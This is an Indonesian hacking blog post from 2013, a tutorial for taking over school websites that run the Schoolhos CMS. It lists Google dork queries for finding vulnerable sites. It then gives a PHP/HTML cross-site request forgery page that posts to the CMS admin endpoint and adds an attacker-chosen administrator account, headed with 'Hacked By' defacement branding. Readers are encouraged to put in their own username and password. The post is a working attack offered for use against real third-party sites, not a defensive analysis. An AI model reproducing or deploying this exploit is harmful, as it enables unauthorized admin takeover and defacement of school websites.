Tutorial Hack Situs Sekolah CMS Schoolhos - CSRF Admin !

Exploit ini sangat mudah digunakan :) saya dapat dari Blognya bang denny katanya "Exploit favorit saya nomor 1 ini mah =)" << kalau menurut Bang Denny lho :D ok langsung saja di coba ya ?

Google Dork: 
inurl:/?p=bukutamu 
intext:Schoolhos Free Open Source CMS



<?php
$self = $_SERVER["PHP_SELF"];
echo 'Target';
echo "<form action=\"$self\" method=\"GET\"><input type=\"text\" name=\"url\"><input type=\"submit\"></form>";
if(!isset($_GET['url'])){
$url = "http://target.com/adminpanel/database/admin.php";
}else
{
$url = $_GET['url'];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Hacked By : VeRZaW#021</title>
 </head>
 <body>
<h1>Hacked By : VeRZaW#021</h1>
<?php echo "Target is : $url"; ?>

<form id="target" method="post" action="<?php echo "$url"; ?>/adminpanel/aplikasi/database/admin.php?pilih=admin&untukdi=tambah">
Isi username yang mau di isi <INPUT type="text"  name="username" value="veriztiarta"><br>
Pass nya<INPUT type="text"  name="password" value="kampret123><br>
<input type="submit" name="insert" value="Insert" >
</form>
</body>
</html> 


Contoh gambar seperti itu ! :D
Teks yang berwarna merah : Jangan ganti Title ya =) hormati yang buat ;) 
Teks yang berwarna Biru : ganti User & Pass nya dengan user&pass kamu :)
Anda baru saja membaca artikel yang berkategori Hacking dengan judul Tutorial Hack Situs Sekolah CMS Schoolhos - CSRF Admin !. Anda bisa bookmark halaman ini dengan URL http://predator-technology.blogspot.com/2013/08/tutorial-hack-situs-sekolah-via-cms-new.html. Terima kasih!
Ditulis oleh: VeRZaW#021 - 2 August 2013

Belum ada komentar untuk "Tutorial Hack Situs Sekolah CMS Schoolhos - CSRF Admin !"

Post a Comment

Mohon Memberi Komentar dengan Kata-Kata yang Sopan !!